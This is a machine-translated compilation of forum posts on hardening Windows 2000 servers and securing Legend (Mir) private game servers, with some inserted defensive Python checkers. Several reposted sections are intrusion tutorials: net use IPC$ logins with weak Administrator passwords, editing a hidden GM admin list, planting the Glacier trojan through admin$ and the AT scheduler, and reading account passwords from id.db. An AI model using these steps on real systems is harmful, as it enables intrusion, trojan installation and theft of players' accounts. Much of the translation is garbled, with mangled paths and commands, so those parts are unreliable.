Server Security Configuration Essence

xiaoxiao2021-03-05  24

Windows 2000 includes many security features and options. If you configure them sensibly, Windows 2000 can be a very secure operating system.

Primary security

1. Physical security

The server should be installed in an isolated room with video surveillance, and the recordings should be kept for more than 15 days. In addition, the chassis, keyboard and desk drawers should be locked so that nobody can use the computer even if they get into the room, and the keys should be kept in a separate secure place.

2. Disable the Guest account

Disable the Guest account under Users in Computer Management so that nobody can log on to the system as Guest. To be safe, it is best to also give Guest a complex password: open Notepad, type a long string containing special characters, digits and letters, then copy it in as the Guest account password.

3. Limit the number of unnecessary users

Remove all duplicate user accounts, test accounts, shared accounts, ordinary department accounts, and so on. Use Group Policy to set appropriate permissions for users, check the system's accounts often, and delete accounts that are no longer in use. These accounts are often the way intruders break into a system: the more accounts a system has, the more likely it is that an intruder obtains the permissions of a legitimate user. On domestic NT/2000 hosts, if the system has more than 10 accounts, one or two of them usually have weak passwords. I once found a host where 180 of its 197 accounts had weak passwords.

4. Create two accounts for the administrator

Although this seems to contradict the previous point, it actually follows the same rule. Create an ordinary-privilege account for routine everyday work, and a second account with Administrators rights that is used only when needed. Administrators can use the "runas" command to perform work that requires privileges, which keeps management convenient.

5. Rename the system Administrator account

As everyone knows, the Windows 2000 Administrator account cannot be disabled, which means others can try passwords for this account over and over. Renaming the Administrator account guards against this. Of course, do not pick a name like Admin, which is as good as not renaming it; try to disguise it as an ordinary user, for example guestone.

6. Create a trap account

What is a trap account? Create a local account called "Administrator", give it the lowest possible permissions so that it cannot do anything, and set a very complex password of more than 10 characters. This keeps the script kiddies busy for a while and lets you detect their intrusion attempts. You can also set something up in its login script.

7. Change the permissions of shared files from the "Everyone" group to "Authorized Users"

"Everyone" means that anyone who can get onto your network can access the shared data. Never assign shared files to the "Everyone" group. This includes shared printers, whose default is also the "Everyone" group; do not forget to change it.

8. Use secure passwords

A good password is very important to a network, yet it is the easiest thing to neglect. The points above may already have shown this. When some company administrators create accounts, they often build the user name from the company name, the computer name, or something similar, and then give these accounts very simple passwords such as "Welcome", "IloveYou", "Letmein", or the same string as the user name. Such accounts should be required to change to a complex password when the user first logs in, and passwords should also be changed regularly. When we discussed this on IRC some time ago, we defined a good password as one that cannot be cracked within its security period: if someone obtains your password file and needs 43 days or longer to crack it, and your password policy forces a change within 42 days, the password is good.

9. Set a screen saver password

This is simple and necessary. A screen saver password is also a barrier that keeps internal staff from tampering with the server. Do not use OpenGL or other complex screen savers, which waste system resources; a blank screen is enough. The machines used by all system users should preferably have a screen saver password as well.

10. Use NTFS partitions

Convert all partitions on the server to NTFS. The NTFS file system is much more secure than FAT and FAT32. This needs no further explanation; presumably everyone's servers already use NTFS.

11. Run anti-virus software

I have never seen a server with anti-virus software installed, but in fact this is very important. Good anti-virus software can not only remove well-known viruses but also detect and remove a large number of Trojans and backdoor programs. That renders the well-known Trojans used by "hackers" useless. Do not forget to update the virus definitions regularly.

12. Keep backup disks safe

If the system is destroyed, the backup disks will be the only way to recover your information. After backing up the data, keep the backup disks in a safe place. Never keep the backups on the same server; in that case you might as well not back up at all.

Intermediate security

1. Use the Win2000 security configuration tools to configure policy

Microsoft provides a set of MMC (Management Console) based Security Configuration and Analysis tools, with which you can configure your server to meet your requirements. For details, see the Microsoft site:

http://www.microsoft.com/windows200...y/sctoolset.asp

2. Turn off unnecessary services

Windows 2000 Terminal Services, IIS and RAS can all introduce security vulnerabilities to your system. Many machines have Terminal Services enabled so that the server can be managed remotely; if yours does too, make sure you have configured Terminal Services correctly. Some malicious programs can also run quietly as services. Keep track of all services running on the server and check them regularly (every day). Below are the default services of a C2-level installation:

Computer Browser service

TCP/IP NetBIOS Helper

Microsoft DNS Server

Spooler

NTLM SSP

Server

RPC Locator

WINS

RPC service

Workstation

Netlogon

Event Log

3. Close unnecessary ports

Closing ports means reducing functionality, so you have to make a trade-off between security and features. If the server sits behind a firewall the risk is lower, but never assume that you can stop worrying. Scanning a system's open ports with a port scanner to determine which services are running is the first step an intruder takes against your system. The table of well-known ports and services in the \system32\drivers\etc\services file is available for reference. Specific method: My Network Places > Properties > Local Area Connection > Properties > Internet Protocol (TCP/IP) > Properties > Advanced > Options > TCP/IP Filtering > Properties. Enable TCP/IP filtering and add the TCP ports, UDP ports and protocols you need.

4. Turn on audit policy

Turning on security auditing is the most basic intrusion detection method in Win2000. When someone attempts to intrude on your system in some way (such as guessing user passwords, changing account policies, or unauthorized file access), the attempt is recorded by the security audit. Many administrators remain unaware for months that their system has been compromised, until it is destroyed. The following audits must be turned on; others can be added as needed:

Policy: Setting

Audit system logon events: success, failure

Audit account management: success, failure

Audit logon events: success, failure

Audit object access: success

Audit policy change: success, failure

Audit privilege use: success, failure

Audit system events: success, failure
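Added example, not part of the original article: one way to use the logon auditing enabled above, flagging failed logons against the trap "Administrator" account from item 6 and any source that reaches the lockout threshold within the 20-minute window. The CSV export layout, host names and records are constructed for illustration; 528, 529 and 539 are the Windows 2000 security-log IDs for a successful logon, a bad user name or password, and a logon attempt on a locked-out account.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Windows 2000 security-log event IDs (pre-Vista numbering).
LOGON_FAILURE = "529"   # unknown user name or bad password
LOCKED_OUT = "539"      # logon attempt on a locked-out account

TRAP_ACCOUNT = "administrator"   # decoy account; the real admin has been renamed
THRESHOLD = 3                    # failures per window, same as the lockout threshold
WINDOW = timedelta(minutes=20)   # same as the lockout counter reset time

# Constructed sample export (assumed columns): time, event id, user, source host.
SAMPLE_LOG = """time,event_id,user,source
2003-05-01 02:10:01,529,Administrator,WKS-UNKNOWN
2003-05-01 02:10:03,529,Administrator,WKS-UNKNOWN
2003-05-01 02:10:05,529,admin,WKS-UNKNOWN
2003-05-01 02:10:09,529,guestone,WKS-UNKNOWN
2003-05-01 08:59:30,529,alice,WKS-ACCT-07
2003-05-01 08:59:58,528,alice,WKS-ACCT-07
2003-05-01 09:30:00,539,bob,WKS-LAB-02
"""


def parse(text):
    """Return the records sorted by time, with 'time' parsed to datetime."""
    rows = []
    for rec in csv.DictReader(io.StringIO(text)):
        rec["time"] = datetime.strptime(rec["time"], "%Y-%m-%d %H:%M:%S")
        rows.append(rec)
    return sorted(rows, key=lambda r: r["time"])


def detect(rows):
    """Return (alert_type, source, user) tuples in chronological order."""
    alerts = []
    recent = defaultdict(list)   # source host -> failure times inside the window
    for r in rows:
        if r["event_id"] == LOCKED_OUT:
            alerts.append(("locked-out-logon", r["source"], r["user"]))
        if r["event_id"] != LOGON_FAILURE:
            continue
        # Nobody legitimate uses the decoy, so a single failure is worth an alert.
        if r["user"].lower() == TRAP_ACCOUNT:
            alerts.append(("trap-account", r["source"], r["user"]))
        # Sliding window per source, regardless of which account was tried.
        window = [t for t in recent[r["source"]] if r["time"] - t <= WINDOW]
        window.append(r["time"])
        recent[r["source"]] = window
        if len(window) == THRESHOLD:   # fire once when the threshold is reached
            alerts.append(("password-guessing", r["source"], r["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(*alert)
```

Counting failures per source rather than per account catches guessing that is spread across several user names and would never lock any single account.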


5. Turn on password policy

Policy: Setting

Password complexity requirements: enabled

Minimum password length: 6 characters

Enforce password history: 5 passwords

Maximum password age: 42 days

6. Turn on account lockout policy

Policy: Setting

Reset account lockout counter after: 20 minutes

Account lockout duration: 20 minutes

Account lockout threshold: 3 attempts
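Added example, not part of the original article: a check of the text printed by the "net accounts" command against the password and lockout values in items 5 and 6, including the 42-day password change interval. The sample output is constructed (English-language label wording is assumed), and treating the listed values as minimum or maximum limits is an assumption of this sketch.

```python
import re

# Baseline from items 5 and 6. "at least" / "at most" is this sketch's reading
# of the values: anything stricter than the article's number also passes.
BASELINE = {
    "Minimum password length":               ("at least", 6),
    "Length of password history maintained": ("at least", 5),
    "Maximum password age (days)":           ("at most", 42),
    "Lockout threshold":                     ("at most", 3),
    "Lockout duration (minutes)":            ("at least", 20),
    "Lockout observation window (minutes)":  ("at least", 20),
}

# Constructed sample of "net accounts" output on a server left at weak settings.
SAMPLE_OUTPUT = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        SERVER
The command completed successfully.
"""


def parse_net_accounts(text):
    """Map each 'label:   value' line to {label: value}."""
    settings = {}
    for line in text.splitlines():
        m = re.match(r"^(.*?):\s{2,}(\S.*)$", line.strip())
        if m:
            settings[m.group(1)] = m.group(2).strip()
    return settings


def audit(settings):
    """Return (setting, current value, requirement) for every deviation."""
    findings = []
    for name, (kind, wanted) in BASELINE.items():
        raw = settings.get(name, "missing")
        # "Never", "None" and "Unlimited" mean the control is switched off.
        value = int(raw) if raw.isdigit() else None
        if value is None:
            ok = False
        elif kind == "at least":
            ok = value >= wanted
        else:
            ok = 1 <= value <= wanted   # 0 would also mean "not enforced"
        if not ok:
            findings.append((name, raw, f"{kind} {wanted}"))
    return findings


if __name__ == "__main__":
    for name, current, wanted in audit(parse_net_accounts(SAMPLE_OUTPUT)):
        print(f"{name}: is {current}, should be {wanted}")
```

The password complexity requirement does not appear in this command's output and has to be checked in the security policy itself.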

7. Set access permissions on the security log

The security log is unprotected by default; set it so that only the Administrator and System accounts can access it.

8. Store sensitive files on a separate file server

Although server hard disks are large nowadays, you should still consider whether it is necessary to store important user data (files, data sheets, project files, etc.) on another, secure server, and back it up frequently.

9. Do not let the system display the last logged-on user name

By default, when Terminal Services connects to the server, the login dialog shows the account that last logged on, and the local login dialog does the same. This makes it easy for others to learn some of the system's user names and then guess passwords. Editing the registry stops the dialog from displaying the last user name:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\DontDisplayLastUserName

Change this REG_SZ value to 1.

10. Prohibit null connections

By default, any user can connect to the server through a null connection, enumerate the accounts, and guess passwords. We can prohibit null connections by editing the registry:

Change the value of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\RestrictAnonymous to "1".

11. Download the latest patches from the Microsoft website

Many network administrators are not in the habit of visiting security sites, so some vulnerabilities have been public for a long time while their servers remain unpatched and become targets. Nobody can guarantee that the millions of lines of code in Windows 2000 contain no security vulnerabilities. Visiting Microsoft and security sites regularly and downloading the latest service packs and vulnerability patches is the only way to keep the server secure in the long term.

Advanced security

1. Turn off DirectDraw

This is a C2-level security requirement concerning video cards and memory. Turning off DirectDraw may affect some programs that need DirectX (such as games; playing StarCraft on the server? I am dizzy...), but it should have no effect on the vast majority of business sites. In the registry, set the Timeout (REG_DWORD) value under HKLM\SYSTEM\CurrentControlSet\Control\GraphicsDrivers\DCI to 0.

2. Close the default shares

After Win2000 is installed, the system creates some hidden shares, which you can check from CMD. There are many articles about IPC intrusion on the Internet, and I believe everyone has come across them. To disable these shares, open Administrative Tools > Computer Management > Shared Folders > Shares, right-click the relevant share and click Stop Sharing. However, after the machine restarts, these shares are created again.

Default shares, their paths and functions:

C$, D$, E$ ...: the root directory of each partition. In Win2000 Pro, only the Administrator and Backup Operators groups can connect; in Win2000 Server, the Server Operators group can also connect to these shares.

ADMIN$: %SYSTEMROOT%. The remote administration share. Its path always points to the Win2000 installation path, such as C:\Winnt.

FAX$: in Win2000 Server, FAX$ is accessed when a fax client sends a fax.

IPC$: null connection. The IPC$ share provides the ability to log in to the system.

NetLogon: this share is used by the Net Login service of Windows 2000 Server when handling domain logon requests.

PRINT$: %SystemRoot%\System32\Spool\Drivers. Used for remote administration of printers.

Solution:

Open the Registry Editor (regedit) and go to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters

In the right-hand pane, create a DWORD value named AutoShareServer and set it to 0.


3. Disable dump file creation

Dump files are very useful for tracking down problems when the system crashes or blue-screens (otherwise I would translate the word literally as "garbage file"). However, they can also expose sensitive information, such as the passwords of some applications. To disable them, open Control Panel > System Properties > Advanced > Startup and Recovery and set Write Debugging Information to None. You can turn it back on when you need it.

4. Use the Encrypting File System (EFS)

Windows 2000's powerful encryption system adds a layer of security to disks, folders and files. It prevents others from reading the data by attaching your hard drive to another machine. Remember to apply EFS to folders, not just to individual files. Detailed information about EFS is available at:

http://www.microsoft.com/windows200...ity/encrypt.asp

5. Encrypt the Temp folder

Some applications copy things to the Temp folder during installation and upgrades, but do not clear its contents when the upgrade finishes or the program closes. Encrypting the Temp folder therefore adds a layer of protection for your files.

6. Lock down the registry

In Windows 2000, only Administrators and Backup Operators have permission to access the registry over the network. If you think this is not enough, you can restrict registry access further; for details see:

http://support.microsoft.com/suppor...s/q153/1/83.asp

7. Clear the page file at shutdown

The page file, also called the swap file, is a hidden file that Win2000 uses to store the parts of programs and data files that are not held in memory. Some third-party programs keep sensitive data in memory, so the page file may also contain sensitive information. To clear the page file at shutdown, edit the registry key

HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

Set the value of ClearPageFileAtShutdown to 1.
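Added example, not part of the original article: a checker that reads a Registry Editor text export and compares it with the five registry settings given in this article (DontDisplayLastUserName, RestrictAnonymous, the DCI Timeout, AutoShareServer and ClearPageFileAtShutdown), including the value type each one should have. The sample export is constructed, and the extra Lmannounce value only stands in for a key that exists without the wanted setting.

```python
import re

HKLM = "HKEY_LOCAL_MACHINE"

# (key, value name, expected type, expected data), all taken from the article.
EXPECTED = [
    (HKLM + r"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
     "DontDisplayLastUserName", "sz", "1"),
    (HKLM + r"\SYSTEM\CurrentControlSet\Control\Lsa",
     "RestrictAnonymous", "dword", 1),
    (HKLM + r"\SYSTEM\CurrentControlSet\Control\GraphicsDrivers\DCI",
     "Timeout", "dword", 0),
    (HKLM + r"\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters",
     "AutoShareServer", "dword", 0),
    (HKLM + r"\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management",
     "ClearPageFileAtShutdown", "dword", 1),
]

# Constructed sample export. A real export file may be UTF-16 encoded and has
# to be decoded accordingly before it is passed to parse_reg().
SAMPLE_EXPORT = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DontDisplayLastUserName"="0"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers\DCI]
"Timeout"=dword:00000007

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"Lmannounce"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001
"""


def parse_reg(text):
    """Return {(key, name): (type, data)}; keys and names are lower-cased
    because the registry treats them case-insensitively."""
    values, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if not (m and key):
            continue
        name, raw = m.group(1).lower(), m.group(2)
        if raw.startswith("dword:"):
            values[(key, name)] = ("dword", int(raw[6:], 16))
        elif raw.startswith('"') and raw.endswith('"'):
            values[(key, name)] = ("sz", raw[1:-1])
        else:
            values[(key, name)] = ("other", raw)
    return values


def check(values):
    """Return (value name, problem) for every setting that deviates."""
    findings = []
    for key, name, kind, wanted in EXPECTED:
        got = values.get((key.lower(), name.lower()))
        if got is None:
            findings.append((name, "not set"))
        elif got != (kind, wanted):
            findings.append((name, f"is {got[0]}:{got[1]}, expected {kind}:{wanted}"))
    return findings


if __name__ == "__main__":
    for name, problem in check(parse_reg(SAMPLE_EXPORT)):
        print(f"{name}: {problem}")
```

Because the comparison includes the type, a DontDisplayLastUserName stored as a DWORD instead of the REG_SZ the article specifies is reported as a deviation.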

8. Prohibit booting from floppy disk and CD-ROM

Some third-party tools can bypass the existing security mechanisms by booting the system themselves. If your server has very high security requirements, consider using removable floppy and optical drives. Locking the chassis is also a good approach.

9. Consider using smart cards instead of passwords

Passwords always leave security administrators in a dilemma: a simple password is easily attacked with L0phtCrack and similar tools, while if the password is too complex, users write it down everywhere in order to remember it. If conditions allow, replacing complex passwords with smart cards is a good solution.

10. Consider using IPSec

As its name suggests, IPSec provides security for IP packets. IPSec provides authentication, integrity, and optional confidentiality. The sending computer encrypts the data before transmission, and the receiving computer decrypts it after receipt. Using IPSec can greatly improve a system's security.

SF must open port, extremely solving port security


Author: krish

Open ports for a Legend server, plus some ports required by Peanut Shell

You can use TCP/IP filtering and open only these ports to increase security (if you run other services, add their ports yourself).

TCP/IP filtering -> TCP ports

Port 7220 .... Rungate 1 port

Port 7210 .... Rungate 2 port 3 Rungate at the same time

Port 7200 .... RUNGATE 3 port

Port 7100

Port 7012

Port 6000

Port 5600

Port 5500

Port 5100

Port 5000

Port 4900

Port 3389

Port 3372

Port 3100

Port 3000

Port 1027

Port 1025

Port 0135

The table of well-known ports and services in the \system32\drivers\etc\services file is available for reference. The specific method is:

My Network Places > Properties > Local Area Connection > Properties > Internet Protocol (TCP/IP) > Properties > Advanced > Options > TCP/IP Filtering > Properties. Enable TCP/IP filtering and add the required TCP ports and protocols.

I opened three Rungate ports, which solved the problem of the server suddenly dropping connections when many players log in at the same time; three worked better. (GGGG7 original)

Method for opening 3 RUNGATE ports:

The Rungate folder replicates 2 parts of Rungate1, Rungate2, Rungate3, which will be changed to Gateport = 7200, Gateport = 7210, Gateport = 7220, respect

Under the DBSRV200 folder! ServerInfo.txt is changed to 127.0.0.1 127.0.0.1 7200 127.0.0.1 7210 127.0.0.1 7220

Mir200 folder below! Servertable.txt change

1 127.0.0.1 7200

2 127.0.0.1 7210

3 127.0.0.1 7220

Then running the 3 Rungate.exe under Rungate1, Rungate2, Rungate3

M2Server will prompt:

Gate 0 OPENED

Gate 1 Opened

Gate 2 Opened

Adding a firewall as appropriate will make it even better.

The attack and defense of private service

I advocate private service technology! Enthusiasm! To work together to create a good game atmosphere!

A few *, this private service also suffered a hacker attack! However, it has been studied several times to discover the vulnerability!

Below I write how to invade the computer, I use Windows 2000 Sever

1 X-SCAN scan IP to see who is a weak password (IP is also very easy to get, private service, weak password is the user name and password is the system default, no change.)

2 Open the DOS system under DOS!

C: /> NET Use //192.168.0.1/IPC / User: Administrator Enter the other party computer user enters the administrator user.

After entering, it will be done, you can find you black private service! Do GM, it is good to destroy and delete, such as do GM!

C: /> Copy //192.168.0.1/d $/mirserver/mir200/envir/adminList.txt is a command, you can see, the rest, how to change, but I have to explain! ! This code is very simple, copy the D disk, a list of legendary GM, you can add yourself to go in editing!

C: /> Edit //192.168.0.1/d $ berirsterver/mir200/envir/adminList.txt

that's it. This is a method of using a weak pass to enter a computer! ! Of course, there are more methods.

Now let me talk about my own experience of having my Legend server hacked!

First, the mouse moved by itself, so it was obviously being controlled. Analysis: 1. infected with a Trojan; 2. remote control!

Second, a dialog box was covered up and the computer suddenly restarted! Analysis: 1. to damage the system; 2. to take control of Legend; 3. a restart was needed for the hacker's changes to take effect!

Third, an illegal GM creating items was discovered. Analysis: the target was Legend!

Solution: 1. Use anti-virus software to scan for viruses, preferably under DOS! 2. Windows 2000 has too many vulnerabilities: look for unused ports, close 3389 and the like, and download the 2000 SP3 patch! Check the Guest user and groups in Control Panel, and disable the IUSR_(computer name) Internet guest account (the hacker used this account to get into my Legend machine). Change the super administrator user name and password, and also turn off remote access!

Attacks on Legend mainly target the GM list. I was hit too, and it looked like this: I opened the adminlist.txt file and found no extra GM, and I used Ctrl-A to check whether there was any extra GM. In addition, look at whether there is a space after the file name adminlist.txt: with the system set to show hidden files, I found an additional hidden GM list file, and that was the cause of the illegal GM. The attack on my computer had been going on for 2 hours when I discovered it; I immediately made the corresponding changes and restored Legend to normal operation. So far I still get warnings that someone is trying to log in with my guest account, but they have not got in! Legend is running normally again! Although I have written down some methods of getting into a computer along with the solutions, and I feel somewhat conflicted about it, my purpose is very simple: I hope to help you solve your problems and improve the security of your own computers.
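Added example, not part of the original post: a check for the indicator described above, a second GM list whose file name differs from adminlist.txt only by spaces and which may carry the hidden attribute. The directory contents are constructed for the demonstration, and the function names are this sketch's own.

```python
import os
import stat
import tempfile
from collections import defaultdict


def tidy(name):
    """Remove the padding that is invisible in a directory listing."""
    stem, ext = os.path.splitext(name.strip())
    return stem.strip() + ext


def is_hidden(path):
    """True if the Windows 'hidden' attribute is set (always False elsewhere)."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return bool(attrs & stat.FILE_ATTRIBUTE_HIDDEN)


def find_lookalikes(directory):
    """Group entries whose names are equal once padding and case are ignored.

    Returns {canonical name: [(real name, hidden?), ...]} for every group that
    has more than one member or contains a padded name.
    """
    groups = defaultdict(list)
    for entry in os.listdir(directory):
        groups[tidy(entry).casefold()].append(entry)
    findings = {}
    for canonical, names in groups.items():
        padded = [n for n in names if n != tidy(n)]
        if len(names) > 1 or padded:
            findings[canonical] = [
                (n, is_hidden(os.path.join(directory, n))) for n in sorted(names)
            ]
    return findings


def build_constructed_directory():
    """Create a throw-away directory holding a GM list and a padded twin."""
    directory = tempfile.mkdtemp()
    for name in ("AdminList.txt", "AdminList.txt ", "Readme.txt"):
        with open(os.path.join(directory, name), "w") as handle:
            handle.write("constructed sample\n")
    return directory


if __name__ == "__main__":
    for canonical, entries in find_lookalikes(build_constructed_directory()).items():
        for name, hidden in entries:
            print(f"{canonical}: {name!r} hidden={hidden}")
```

Printing the names with repr() makes the trailing space visible, which an ordinary directory listing does not.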


Some sf has a true cause of illegal GM ~

Repost


Here is how to do illegal GMs without being expressed in the GM file, nor the problem of behind the door, please see the repost, I hope everyone is strictly prepared ~

How to do GM ????

Attack primary teaching

I am using the method used by others 4F

Seeing some 4F is doing well, but in turn is not very rich, no equipment, the master is also a lot, I have never like me in the rookie, and I have a lot of trouble to enter their server. Foot enough to add addiction, now I publish the method and everyone. . . .

In fact, the method I use is very simple, only 4 tools:

(1): SHED.EXE

(2) Flower 2000

(3) cmd.exe (in fact, DOS below 2000)!

(4) Ice 8.4 operating system: Win2000 Server or WinXP system. "SHED.EXE": It is actually used to check the shared resources, fast, you can find a lot of service-breaking copies, but some IPs are not accessible in the browser, because it also contains Personal Internet IP. Ha ha! Some of the websites of the website, Internet cafes are shared, some are accessible, but they can't delete, because you have access to anonymous access, so the permissions are not enough! Some need password. What should I do if I encounter my password? With stream! Although "stream" is limited to 202, it is not limited to the IP of small Japan, huh, huh! So use the IPC detection of the streamer, create an empty dialogue, find the list of users, and then simply detect, some network management is lazy, put the Administrator set too simple, huh, you can catch it. How do you do next step? Maybe when you check the other party's port, I found that the port of the other party is very small, such as FTP is not open, what should I do? Ice! "Ice", I want to have many friends to play, using the ice river to control a server speed, (because the bandwidth is wide) a few minutes to find the homepage of the other host. But how to upload and control him? "Cmd.exe" is DOS under 2000, performs cmd.exe using the net command,

The specific operation is as follows:

The first step: NET USE // IP / IPC $ "Password" / user: "user" Description: Establish a join with your favorite website with a super user name, and of course the super user must be in the site admin. The "IP" here is the host, "password" is the superuser password, "User" is a super user. For example: Net use //210.248.250.2/IPC $ "maozhiie" / user: maozhijie

Step 2: Copy G-Server.exe // IP / Admin $ / SYSTEM32 Description: g-server.exe is the remote server side of the Ice. Significance: Copy this file to the system32 directory in the Host WinNT of the other party. Maybe someone wants to ask Trojans to be observed, huh, huh! Installed the firewall estimation, but many hosts have no money to buy! Unlike Chinese piracy! If you have the latest Trojans! This is the best! !嘿 ...

Step 3: NET TIME // IP looks at the other party's server time. Because there is a time difference, it should be an hour! Therefore, you must be based on the other party's server time.

Step 4: AT // ip time g-server.exe The TIME here is the other party's host time. Role: Execute the program at a specified time. For example, at //210.248.250.2 19:55 g-server.exe fifth step: the ice river can control the computer. I don't say this, huh, huh! The software that rookie will also play.

At this time we can control the server,

NET USE * // ip / * $ Remote Mapping

look at this

There is some data of everyone in mir.db, and you can use it.

Access finds to change, change a few best, such as 0-80 attack wood sword, 0-50 magic's hex rings, then you will. It's just that it is too annoying. Ha ha. For example, weapons, data formats are as follows (all 16)

** ** ** ** CE 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0A

The front ** is the item code, then the 0xCE 00 is the weapon code (high in post), and the item DB database corresponds.

Example: The Dragon Slayer is the serial number (IDX) is 205, and the corresponding is (205 1) to 16-based CE

The latter 43 12 is current lasting, 88 13 is the maximum laster.

Example: 43 12 conversion into ten into 17170, long lasting is 17

The latter 01 02 03 is an attack, magic, and Taoism.

Note that it is incremented on the basis of the original Wu.

Example: The above Dragon is shown to be an attack: 5-36, Taoji: 0-2, Magic: 0-3.

The latter 04 05 06 07 08 09 is in turn is the lucky, curse, accurate, attack speed, intensity of the weapon.

The 0x0a followed by the back of the two vacation is to indicate whether the weapon is cultivated, specifically

When adding attacks to weapons:

Before cultivating: 00

After practicing: 0A

After the test was successful: 00, the attack value increased.

For jewelery and clothes, you study it yourself, there are many people who know, I have not waited. The article in this area is there, I don't have to say more?

Then arrive, | mirserver / mud2 / logsrv / iddb

Here is an id.db owner's account and password, you look at it, but the number of stealing people is not a glorious thing. I never do it, just often take the GM number to reload. a bit. Ha ha

Here, I will see you and then add to the administ, huh, here is a bit, here, join your name), then we find the GM account in mir.db, then go to ID.db Find the password of this account. Ok, OK, use the GM number to enter the game (I will get in front of him, don't let people find it, don't change people's password, let people find more, huh). Match @reloadadmin. Immediate OUT.

Then, put the characters you join the adminlist from adminlist, okay, you go in the game, you are GM, but the real GM will not see your name from the server side! ! He may think about "What happened here? It seems to have a GM ???". Oh, but don't fire, or a Reload your permissions are gone.

When you do your GM, you will do it. Here I said is how remote control server host, such as shutting down, restarting ...


I don't know much about private server technology, but I do know a thing or two about server security!

Server intrusions rely mainly on account names and passwords. Everyone must understand what a system account is and what a system password is!

Every Windows system has its super administrator account and password!

Once these are scanned out by hackers, you are under threat!

When your private server is very popular and a hacker gets in and decides to delete the data, by then it will be really miserable.

One: Understanding accounts

Run CMD first

Then enter: net user (Enter)

This displays the list of accounts

Then view the administrator accounts

Enter: net localgroup administrators

This lists the users in the Administrators group. Hidden accounts can also be found this way!

The system's built-in super administrator account is Administrator

Remember: if accounts you do not recognize appear here, it shows that your machine is not safe. If the accounts that appear are all your own, then in all likelihood your machine has not been invaded

Account safety:

Two: Passwords

If your own account password is something like 123456, it will not last three seconds.

To change the password, doing it under DOS is safer

Enter net user, the account name and the new password (then press Enter)

In general, the more complex the password, the better!

Overflow:

The 2000 Server edition installs IIS automatically. If you do not use IIS, stop it. To find IIS: Start > Programs > Administrative Tools > Internet Information Services (this is IIS). Open it and press Stop! That is a step safer. However, if you do need IIS, remember to install the latest patch, SP4.

RPC overflow: try telnet IP 135 to see whether the port is open. If it is open, install the RPC patch. If you cannot find the patch, simply install a firewall and block port 135!

Everyone must remember: the most important thing for breaking into a system is the account password. Protect your accounts and passwords, and security will be yours!

This article is meant to draw the attention of the majority of 4F owners

Invasion of the legendary private service / act as illegal GM.

First of all, I have to declare that I don't teach you how to go to black 4F, just want to cause the majority of 4F owners to pay attention to this article.

Improve your own network management level.

I love to play games, but I have a good dish, I don't have time to play, I just want to play with it, so when I start playing legendary,

Although it is fun, it is simply being guilty, the upgrade is slow, and there is no good equipment, and it is bullied everywhere. So, 4f is clear

The choice of intelligence, but there is no good equipment when I go in, and I am bullied. Don't I do GM? Try, FOLLING ME!

Look for a lot of 4F IP, open an X-Scan sweep. Yes, there is a lot, all of which are weak, these network managers.

Choose one, 192.168.0.1, go!

Open CMD,

1) C: /> NET Use 192.168.0.1ipc $ / user: administrator

connection succeeded,

OK, even, success,

2) C: /> Copy 192.168.0.1d $ mirsermir200nviradminList.txt

The system can not find the file specified.

No? impossible? Oh, it must be hidden, it doesn't matter, come back,

3) C:> attrib -r -h 192.168.0.1d $ mirsermir200nviradminList.txt

No prompt, success,

This time, the copy is not available, change it directly,

4) C:> Edit 192.168.0.1d $ mirsermir200nviradminList.txt

Will open a diamond, look at what GM inside, add one, remember it, change the save and exit 5) C:> Attrib R H 192.168.0.1d $ mirsermir200nviradminList.txt

Restore adminiList.txt into read-only hidden,

Ok, I'm big, I will sweep the footprint, don't let people find it to be invaded.

Now, wait for the system to restart, wait until the fifth step, let it restart, but this is too dangerous, or wait.

,

The next day, registered an account, and the newly added prior to the new year.

/ WHO

Current 150 people online

Ha, I am GM. Hurry and upgrade yourself,

@Lesvel -1

Upgrade success, 255, haha

Reproduce the desired equipment, want to make anything,

Repeat the above to delete yourself from adminList.txt, haha, good equipment to your hand, you can play

I remember that a friend wrote a series of descriptions on strengthening server security, which was very detailed, but I think there is still a lot that needs to be added. Microsoft's systems are known for their vulnerabilities and patches; truly securing a server is very difficult, and there is a great deal to consider.

Today I will talk about one aspect, as a further supplement to my friend's earlier article!

My friend's earlier article was an overview of security settings against weak passwords on Win2000 systems! He covered it very thoroughly. Passwords really are important on the Internet: I ran a series of tests on foreign hosts, and many systems still have weak passwords! Even the web, e-mail and proxy servers of small and medium-sized enterprises make this low-level mistake!

Even if you are very careful in this respect, you should also examine which services your server is running and what else it has open; you should be very clear about this! Most hacker software, Trojan tools and remote-control software run as services on your server, and ordinary firewalls and anti-virus software do not react to control tools that take the form of a service. To spot them more easily, you must be very familiar with which services are running on the server, and apply security settings to unfamiliar or strange services.

Below is my Win2000 WWW (IIS) server security configuration. The WWW service is installed by default in the Win2000 Server and Advanced Server editions; if you do not need the 2000 WWW service, it is recommended not to install it. You can remove it through Add/Remove Programs in Control Panel, or set the startup type of the World Wide Web service to Manual/Disabled under Administrative Tools / Services.

That way the system will not start the service by default!

